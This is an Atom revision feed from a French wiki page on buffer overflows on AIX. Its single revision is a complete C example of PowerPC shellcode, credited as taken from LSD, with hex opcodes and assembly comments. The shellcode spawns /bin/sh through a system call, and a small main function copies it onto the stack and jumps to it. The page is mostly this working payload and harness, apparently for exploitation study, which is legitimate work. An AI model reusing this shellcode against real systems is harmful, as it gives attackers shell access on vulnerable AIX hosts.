https://futex.re/mediawiki/index.php?action=history&feed=atom&title=1.2_BOF_sur_AIX
1.2 BOF sur AIX - Historique des versions
2026-05-13T16:19:13Z
Historique des versions pour cette page sur le wiki
MediaWiki 1.39.17
https://futex.re/mediawiki/index.php?title=1.2_BOF_sur_AIX&diff=1531&oldid=prev
Futex le 5 juin 2012 à 18:57
2012-06-05T18:57:23Z
<p></p>
<p><b>Nouvelle page</b></p><div>Exemple d'un shellcode sur AIX<br />
<br />
/* shellcode.c<br><br />
* ripped from lsd<br> <br />
*/<br><br />
char shellcode[] = /* 12*4+8 bytes */<br><br />
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */ [L1]<br><br />
"\x40\x82\xff\xfd" /* bnel <shellcode> */ [L2]<br><br />
"\x7f\xe8\x02\xa6" /* mflr r31 */ [L3]<br><br />
"\x3b\xff\x01\x20" /* cal r31,288(r31) */ [L4]<br><br />
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */<br><br />
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */<br><br />
"\x90\x7f\xff\x10" /* st r3,-240(r31) */<br><br />
"\x90\xbf\xff\x14" /* st r5,-236(r31) */<br><br />
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */<br><br />
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */ [L10]<br><br />
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */ [L11]<br><br />
"\x44\xff\xff\x02" /* svca */ [L12]<br><br />
"/bin/sh"<br><br />
"\x06";<br><br />
;<br>int main(void)<br>{<br><br />
char burp[256];<br><br><br />
// On veut etre sur d'etre en stack<br><br />
memcpy(burp, shellcode, sizeof(shellcode)); <br><br />
int jump[2]={(int)burp,0};<br><br />
((*(void (*)())jump)());<br>}</div>
Futex